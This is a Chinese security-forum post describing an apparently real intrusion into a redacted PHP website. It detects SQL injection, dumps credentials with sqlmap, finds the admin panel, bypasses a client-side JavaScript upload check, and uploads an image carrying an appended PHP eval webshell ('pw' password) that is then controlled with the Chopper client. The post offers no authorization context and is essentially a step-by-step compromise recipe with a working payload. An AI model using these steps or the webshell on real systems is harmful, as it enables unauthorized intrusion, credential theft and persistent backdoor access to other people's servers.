安全矩阵

 找回密码
 立即注册
搜索
查看: 2093|回复: 0

记录一次实战,注入+本地JS绕过拿shell

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2022-5-14 09:41:05 | 显示全部楼层 |阅读模式
原文链接:记录一次实战,注入+本地JS绕过拿shell



2.测试是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,没有回显


输入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回显,and 1 = 2,没有回显
说明存在注入。

3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”


发现有注入,然后使用–dbs,–tables,–columns,–dump找出用户名和密码。

4.使用御剑扫描后台。然后进行登录。

我们先上传一个脚本木马试试。


发现有黑名单。先看下是否是本地js校验。右键
——审查元素,发现是本地js校验。


我们找到表单form,删除相对应的脚本。


5.重新上传php一句话,发现

那么试下图片马

6.将图片使用C32Asm打开,在最后面添加一句话:<?php @ eval ( $_POST [ 'pw' ]); ?>


保存,命名为a.php。
然后上传,发现上传成功,使用菜刀连接,密码pw。


保存,命名为a.php。
然后上传,发现上传成功,使用菜刀连接,密码pw。













本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 06:56 , Processed in 0.013077 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表